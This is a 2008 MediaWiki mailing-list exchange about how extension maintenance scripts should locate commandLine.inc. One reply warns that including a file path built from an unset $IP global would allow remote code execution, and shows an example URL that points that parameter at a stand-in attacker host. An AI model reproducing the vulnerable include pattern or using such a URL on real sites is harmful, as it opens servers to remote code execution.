"Tim Starling" <tstarling(a)wikimedia.org> wrote in
message news:fung8v$bon$1@ger.gmane.org...
Andrew Garrett wrote:
> On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements
<gmane(a)kennel17.co.uk>
wrote:
>> From an extension writer's point of
view, the current situation is to
put in
>> a relative require_once() line to
commandLine.inc and hope that the
file is
in the expected place.
global $IP;
require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Besides not working, that would be an arbitrary remote code execution
vulnerability:
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://e
vil.com
$IP is not defined at the point that the script is run. $IP is defined by
including commandLine.inc, so you're getting into a bit of a circular
scenario there... :-)
> A better way to do it is:
> require(
dirname(__FILE__).'/../../maintenance/commandLine.inc' );
> If that path doesn't exist, the
sysadmin can create it. Scripts that rely
> on the working directory being $IP or whatever are really annoying.
That is the current method, which causes problems as detailed in my previous
post. To expand on your point, scripts that rely on the extension being in
the extensions folder are also annoying.
We provide MediaWiki to our clients via a symlink in their web folder. They
have an 'extensions' folder in their home directory where they can add their
own extensions (the MW extensions folder is also used for the MW extensions
we have enabled globally and which we offer support for). Currently there
is no easy way for them to run the maintenance scripts for the extensions
they have locally installed without hacking the code to fix the paths.
- Mark Clements (HappyDog)